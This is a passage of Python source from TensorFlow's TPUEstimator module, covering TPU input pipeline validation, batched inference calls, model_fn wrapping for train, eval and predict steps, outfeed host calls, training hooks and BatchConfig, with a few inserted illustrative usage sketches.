self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id))
else:
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
# NOTE(xiejw): We dispatch here based on the return type of the
# users `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should always be safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
# infeed_queue is used to generate dequeue ops. The only thing it uses for
# dequeue is dtypes and shapes, so any one can be used. Here, grab the
# first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, [
util_lib.MultiHostDatasetInitializerHook(all_dataset_initializers)
], run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
"""Validates the input pipeline.
Performs some sanity checks and logs user-friendly information. Ideally we
would error out to give users a better error message, but if
_WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior) we cannot break
user code, so we only log a warning.
Raises:
RuntimeError: If the validation failed.
"""
if tf.compat.v1.get_default_graph().get_collection(tf.compat.v1.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/guide/datasets for '
'instructions).')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
tf.compat.v1.logging.warn(err_msg)
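# A minimal sketch of the flatten/unflatten round trip that
# `InputsStructureRecorder` above performs with TF nest, so that arbitrarily
# nested (features, labels) structures can cross the infeed/outfeed boundary
# as flat tensor lists. The helper name and structure are illustrative only.
def _sketch_flatten_unflatten(features, labels):
  structure = {'features': features, 'labels': labels}
  flat_tensors = tf.nest.flatten(structure)  # What infeed actually carries.
  restored = tf.nest.pack_sequence_as(structure, flat_tensors)  # After dequeue.
  return restored['features'], restored['labels']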
def call_computation(computation_inputs,
computation,
batch_config=None):
"""Call computation.
Args:
computation_inputs: A tensor or dict of tensors, the inputs to the
computation.
computation: A Python function that takes the computation inputs and builds
the computation graph. If `computation` returns m outputs, this function
will return a list of m Tensors.
batch_config: A BatchConfig named tuple specifying the batching
configuration to use for inference batching.
Returns:
A list of output tensors.
"""
# Using `TPUPartitionedCall` makes it possible to target a different
# TPU core with every `Session.run()` call. Note that the entire inference
# graph executes on a single core, and that invocations of this graph
# will round-robin among the cores attached to a host.
def tpu_partitioned_call(partition_inputs):
# capture_resource_var_by_value enables variables to be mirrored on TPU
# to avoid fetching from CPU, since variables do not change during
# inference.
@function.Defun(capture_resource_var_by_value=True)
def tpu_subgraph():
return computation(partition_inputs)
return tpu_functional.TPUPartitionedCall(
args=tpu_subgraph.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_subgraph.definition.signature.output_arg],
f=tpu_subgraph)
# Not using the batching function, but still using TPUPartitionedCall on all cores.
if not batch_config:
return tpu_partitioned_call(computation_inputs)
# Use the batching function and TPUPartitionedCall on all cores.
# Note that BatchingFunction requires a list of tensors and doesn't support
# a dict of tensors. So we preserve the structure by deterministically
# flattening the dict before batching and then recomposing it after batching
# to feed into the computation.
ordered_inputs_list = tf.nest.flatten(computation_inputs)
@tf.nondifferentiable_batch_function(
num_batch_threads=batch_config.num_batch_threads,
max_batch_size=batch_config.max_batch_size,
batch_timeout_micros=batch_config.batch_timeout_micros,
allowed_batch_sizes=batch_config.allowed_batch_sizes,
max_enqueued_batches=batch_config.max_enqueued_batches,
autograph=False)
def batched_tpu_computation(*tensor_args):
"""Recompose the input feature dict and calls the TPU computation."""
computation_feature_input = tf.nest.pack_sequence_as(computation_inputs,
tensor_args)
return tpu_partitioned_call(computation_feature_input)
return batched_tpu_computation(*ordered_inputs_list)
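# A minimal sketch of pairing `call_computation` above with a `BatchConfig`
# (defined near the end of this module) for batched TPU inference. The
# numeric values and the `tpu_computation` argument are illustrative only.
def _sketch_batched_inference(computation_inputs, tpu_computation):
  batch_config = BatchConfig(
      num_batch_threads=2,
      max_batch_size=128,
      batch_timeout_micros=10 * 1000,
      allowed_batch_sizes=[8, 32, 128],
      max_enqueued_batches=10)
  return call_computation(computation_inputs, tpu_computation,
                          batch_config=batch_config)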
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
This makes calling model_fn on CPU and TPU easier and more consistent, and
performs the necessary checks and mutations required by TPU training and
evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def _add_embedding_features(self, features, hook_dummy_table_variables):
"""Add embedding features, optionally add hook to intercept gradient."""
if self._ctx.embedding_config:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
embedding_activations = tpu_embedding_.get_activations()
if hook_dummy_table_variables:
new_embedding_activations = (
tpu_embedding_gradient.hook_dummy_table_variables_to_activations(
tpu_embedding_, embedding_activations,
self._ctx.embedding_config.dummy_table_variables))
features.update(new_embedding_activations)
else:
features.update(embedding_activations)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input should be taken from TPU infeed rather
than input pipeline (input_fn) directly. To fit TPU loop and replicate
pattern, the original train computation should be reformed, which is the
returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of train_fn, host_calls, captured scaffold_fn, and captured
training hooks. The train_fn represents the train step for TPU.
"""
host_call = _OutfeedHostCall(
self._ctx, outfeed_every_n_steps=self._config.tpu_config
.experimental_host_call_every_n_steps)
captured_scaffold_fn = _CapturedObject()
captured_training_hooks = _CapturedObject()
def train_step(step):
"""Training step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, True)
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if tensor_tracer.TensorTracer.is_enabled():
tt = tensor_tracer.TensorTracer()
loss = tt.trace_tpu(tf.compat.v1.get_default_graph(), loss, train_op,
self._ctx.num_replicas)
tracer_host_call = tt.host_call_deps_and_fn()
else:
tracer_host_call = {}
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
captured_training_hooks.capture(estimator_spec.training_hooks)
if self._ctx.embedding_config is None:
apply_sparse_grads = []
else:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
gradients = (
tpu_embedding_gradient.get_gradients_through_dummy_table_variables(
tpu_embedding_)
)
grad_multiplier = self._ctx.embedding_config.get_grad_multiplier()
if grad_multiplier is not None:
scaled_gradients = collections.OrderedDict(
(k, v * grad_multiplier) for k, v in six.iteritems(gradients))
else:
scaled_gradients = gradients
apply_sparse_grads = [
tpu_embedding_.generate_send_gradients_op(scaled_gradients,
tf.compat.v1.train.get_global_step())
]
# We must run train_op to update the variables prior to running the
# outfeed.
with tf.control_dependencies([train_op] + apply_sparse_grads):
host_call_outfeed_ops = []
host_call_fn, host_call_args = None, []
if (isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec) # pylint: disable=protected-access
and estimator_spec.host_call is not None):
host_call_fn, host_call_args = estimator_spec.host_call
if host_call_fn:
# Ignore dummy hostcalls (no arguments)
if host_call_args:
tracer_host_call.update({'host_call': estimator_spec.host_call})
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
elif tracer_host_call:
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
else:
# Create a host call for the loss to track execution progress
# Without this, we don't have any indication of the state of the
# TPU program.
tracer_host_call.update({
'host_call': (lambda loss_t: loss_t,
[tf.reshape(loss, [1])])
})
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
with tf.control_dependencies(host_call_outfeed_ops):
return tf.identity(loss)
return (train_step, host_call, captured_scaffold_fn,
captured_training_hooks)
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
For TPU evaluation, a eval (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input and output are slightly different. Input,
features and labels, should be taken from TPU infeed rather than input
pipeline (input_fn) directly. Output is managed in two stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
To fit TPU evaluation pattern, the original eval computation should be
reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of eval_fn, host_calls, captured scaffold_fn, and captured eval
hooks. The eval_fn represents the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_eval_hooks = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, False)
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type '
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_eval_hooks.capture(tpu_estimator_spec.evaluation_hooks)
to_record = {}
if tpu_estimator_spec.eval_metrics:
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with tf.control_dependencies(host_calls.create_enqueue_op()):
return tf.math.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of predict_fn, host_calls, captured scaffold_fn, and captured
prediction hooks. The predict_fn represents the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_predict_hooks = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU prediction must have type '
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions)
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_predict_hooks.capture(tpu_estimator_spec.prediction_hooks)
to_record = {}
identity_fn = lambda **kwargs: kwargs
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with tf.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return (predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks)
def _verify_tpu_spec_predictions(self, predictions):
"""Validates TPUEstimatorSpec.predictions dict."""
# TODO(xiejw): Adds validation for the prediction dictionary.
# TODO(xiejw): Adds support for single tensor as predictions.
if not isinstance(predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
for (key, tensor) in predictions.items():
if tensor.shape.dims[0].value is None:
raise ValueError(
'The tensor with key ({}) in TPUEstimatorSpec.predictions has '
'dynamic shape (should be static). Tensor: {}'.format(key, tensor))
return predictions
def _validate_model_features_and_labels(self, features, labels,
is_export_mode):
"""Validates that the features and labels for the model function are valid.
A valid features/labels object is the one with:
- Type: A tensor or any nested structure of tensors supported by TF nest,
namely nested dictionary, tuple, namedtuple, or sequence of tensors.
- Static shape if is_export_mode is False.
Args:
features: the features that would be input to the model function.
labels: the labels that would be input to the model function.
is_export_mode: boolean value specifying if in export mode.
Raises:
TypeError: If features/labels are not of the correct type.
ValueError: If features/labels have dynamic shape.
"""
def validate(obj, obj_name):
"""Helper validate function."""
if is_export_mode or self._ctx.is_running_on_cpu(is_export_mode):
return
if isinstance(obj, tf.Tensor):
if not obj.get_shape().is_fully_defined():
raise ValueError(
'The {} to the model returned by input_fn must have static shape.'
' Tensor: {}'.format(obj_name, obj))
else:
for tensor in data_nest.flatten(obj):
if not tensor.get_shape().is_fully_defined():
raise ValueError(
('The {} to the model returned by input_fn must have static '
'shape. Tensor: {}').format(obj_name, tensor))
validate(features, 'features')
if labels is not None:
validate(labels, 'labels')
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
self._validate_model_features_and_labels(features, labels, is_export_mode)
model_fn_args = function_utils.fn_args(self._model_fn)
kwargs = {}
# Makes a deep copy of `config` and `params` in case the user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
_add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn)
running_on_cpu = self._ctx.is_running_on_cpu(is_export_mode)
# In export mode, params['use_tpu'] has already been set based on mode
# (i.e. True for _REWRITE_FOR_INFERENCE_MODE, False otherwise).
if not is_export_mode:
_add_item_to_params(params, _USE_TPU_KEY, not running_on_cpu)
if not running_on_cpu:
user_context = tpu_context.TPUContext(
internal_ctx=self._ctx, call_from_input_fn=False)
_add_item_to_params(params, _CTX_KEY, user_context)
estimator_spec = self._model_fn(features=features, **kwargs)
if (running_on_cpu and
isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)): # pylint: disable=protected-access
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`. As we are running on the CPU, escape
# the TPUInferenceContext.
graph_context = tf.compat.v1.get_default_graph()._get_control_flow_context()
try:
if isinstance(graph_context, tpu._TPUInferenceContext):
tf.compat.v1.get_default_graph()._set_control_flow_context(
graph_context.outer_context)
return estimator_spec.as_estimator_spec()
finally:
tf.compat.v1.get_default_graph()._set_control_flow_context(
graph_context)
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(
err_msg.format('training_chief_hooks') + ' If you want' +
' to pass training hooks, please pass via training_hooks.')
if estimator_spec.scaffold:
tf.compat.v1.logging.warn('EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
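# A minimal sketch (hypothetical model) of a user `model_fn` that satisfies
# the checks performed by `_ModelFnWrapper._call_model_fn` above: it accepts
# `params` (so TPUEstimator can inject params['batch_size']) and consults
# params['use_tpu'] when wrapping the optimizer.
def _sketch_model_fn(features, labels, mode, params):
  logits = tf.compat.v1.layers.dense(features, 10)
  loss = tf.compat.v1.losses.sparse_softmax_cross_entropy(
      labels=labels, logits=logits)
  optimizer = tf.compat.v1.train.GradientDescentOptimizer(0.01)
  if params.get('use_tpu'):
    optimizer = tf.compat.v1.tpu.CrossShardOptimizer(optimizer)
  train_op = optimizer.minimize(
      loss, global_step=tf.compat.v1.train.get_global_step())
  return TPUEstimatorSpec(mode=mode, loss=loss, train_op=train_op)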
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx, outfeed_every_n_steps=1):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
self._outfeed_every_n_steps = outfeed_every_n_steps
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = function_utils.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
tf.compat.v1.logging.warn(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self, step=None):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
if self._outfeed_every_n_steps > 1 and step is None:
raise ValueError('If outfeed is requested every n steps, you must pass '
'a tensor whose value is the step number within the '
'current training loop.')
with tf.compat.v1.device(tf.compat.v1.tpu.core(0)):
if self._outfeed_every_n_steps == 1:
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
else:
return [tf.compat.v1.cond(
tf.math.equal(tf.math.floormod(step, self._outfeed_every_n_steps), 0),
lambda: tpu_ops.outfeed_enqueue_tuple(tensors),
lambda: tf.no_op())]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
across all shards. The concatenated tensors are passed to the host_fn,
which is executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return {}
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
# constrain it such that we have at most one outfeed dequeue and enqueue
# per replica.
for i in xrange(self._ctx.num_replicas):
host_device, ordinal_id = self._ctx.device_for_replica(i)
with tf.compat.v1.device(host_device):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal_id)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
flat_dequeue_ops = []
for l in dequeue_ops:
flat_dequeue_ops.extend(l)
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos +
len(self._tensors[name])]
pos += len(self._tensors[name])
def _call_host_fn(fn, *args, **kw):
context = CatchInvalidHostcallFunctions()
context.Enter()
result = fn(*args, **kw)
context.Exit()
context.ExitResult(result)
return result
# It is assumed evaluation always happens on a single-host TPU system. So,
# place all ops on the TPU host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with tf.compat.v1.device(self._ctx.tpu_host_placement_function(replica_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
# TODO(xiejw): Make the specification of the outfeed combination
# function more explicit and well-documented. We may want to give the
# user the option of concatenating along any axis.
if (self._ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST):
# If the infeed is in BROADCAST mode (each core receiving the same
# input), then we assume that the cores also produce identical
# copies of the same output, and we simply take the output from
# the first core. This mode is used by Mesh-TensorFlow.
with tf.control_dependencies(dequeue_ops[i]):
dequeue_ops[i] = tf.identity(dequeue_ops[i][0])
else:
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
# Assume that the input has been batch-split and that axis 0 of the
# output tensors represents the batch size. Concatenate along
# the axis 0 to re-combine the batch.
dequeue_ops[i] = tf.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = _call_host_fn(self._host_fns[name], **dequeue_ops)
except TypeError as e:
tf.compat.v1.logging.warn(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
else:
ret[name] = _call_host_fn(self._host_fns[name], *dequeue_ops)
# force all dequeue operations to be run if not consumed by the host calls
ret['__force_dequeue'] = tf.group(*flat_dequeue_ops)
return ret
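# --- Editor's illustrative sketch; not part of the original module. ---
# `create_tpu_hostcall()` above dequeues each outfeed tensor, concatenates it
# along axis 0 across all shards, and runs the registered host_fn on the first
# host with the concatenated tensors. A host_call supplied through
# `TPUEstimatorSpec(host_call=...)` is just a `(host_fn, tensors)` pair shaped
# as sketched here; the name `_example_make_host_call` and the summary layout
# are hypothetical.
def _example_make_host_call(global_step, loss, model_dir='/tmp/example_model'):
  """Hypothetical builder for a host_call pair; not used by this module."""
  def host_fn(global_step, loss):
    # Tensors arrive with a leading (shard-concatenated) dimension, so index
    # or reduce them before writing summaries.
    with contrib_summary.create_file_writer(model_dir).as_default():
      with contrib_summary.always_record_summaries():
        contrib_summary.scalar('loss', loss[0], step=global_step[0])
        return contrib_summary.all_summary_ops()
  # Outfed tensors must keep at least one dimension, hence the reshapes.
  return (host_fn,
          [tf.reshape(global_step, [1]), tf.reshape(loss, [1])])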
class _OutfeedHostCallHook(tf.compat.v1.train.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return tf.compat.v1.train.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(tf.compat.v1.train.StepCounterHook):
"""Calculate and report global_step/sec and examples/sec during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
global_step_per_sec = elapsed_steps / elapsed_time
examples_per_sec = self._batch_size * global_step_per_sec
if self._summary_writer is not None:
global_step_summary = Summary(value=[
Summary.Value(tag='global_step/sec', simple_value=global_step_per_sec)
])
example_summary = Summary(value=[
Summary.Value(tag='examples/sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(global_step_summary, global_step)
self._summary_writer.add_summary(example_summary, global_step)
tf.compat.v1.logging.info('global_step/sec: %g', global_step_per_sec)
tf.compat.v1.logging.info('examples/sec: %g', examples_per_sec)
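# --- Editor's illustrative sketch; not part of the original module. ---
# ExamplesPerSecondHook reports examples/sec as batch_size * global_step/sec.
# This shows a typical way to attach it when driving an Estimator directly;
# the helper name, step count and batch size below are hypothetical.
def _example_attach_examples_hook(estimator, train_input_fn):
  """Hypothetical helper; not used by this module."""
  examples_hook = ExamplesPerSecondHook(
      batch_size=1024,                 # global batch size consumed per step
      every_n_steps=100,               # emit summaries every 100 global steps
      output_dir=estimator.model_dir)  # write next to the model checkpoints
  return estimator.train(input_fn=train_input_fn, max_steps=10000,
                         hooks=[examples_hook])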
class InstallSignalHandlerHook(tf.compat.v1.train.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class ExportSavedModelApiVersion(enum.Enum):
V1 = 1
V2 = 2
class BatchConfig(
collections.namedtuple('BatchConfig', [
'num_batch_threads', 'max_batch_size', 'batch_timeout_micros',
'allowed_batch_sizes', 'max_enqueued_batches'
])):
"""Class to handle config inputs into the batching function."""
def __new__(cls,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes,
max_enqueued_batches=10):
"""Creates an BatchConfig instance.
Args:
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op
to pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to
10.
Returns:
      A BatchConfig instance.
"""
return super(BatchConfig, cls).__new__(
cls,
num_batch_threads=num_batch_threads,
max_batch_size=max_batch_size,
batch_timeout_micros=batch_timeout_micros,
allowed_batch_sizes=allowed_batch_sizes,
max_enqueued_batches=max_enqueued_batches)
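# --- Editor's illustrative sketch; not part of the original module. ---
# A BatchConfig simply bundles the server-side batching knobs described in the
# docstring above; per that docstring, allowed_batch_sizes must increase
# monotonically and end at max_batch_size. The values here are hypothetical.
_EXAMPLE_BATCH_CONFIG = BatchConfig(
    num_batch_threads=2,            # two scheduling threads
    max_batch_size=8,               # never batch more than 8 requests together
    batch_timeout_micros=5000,      # flush an incomplete batch after 5 ms
    allowed_batch_sizes=[2, 4, 8],  # pad each batch up to one of these sizes
    max_enqueued_batches=10)        # queue depth before requests back up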
@estimator_export(v1=['estimator.tpu.TPUEstimator'])
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
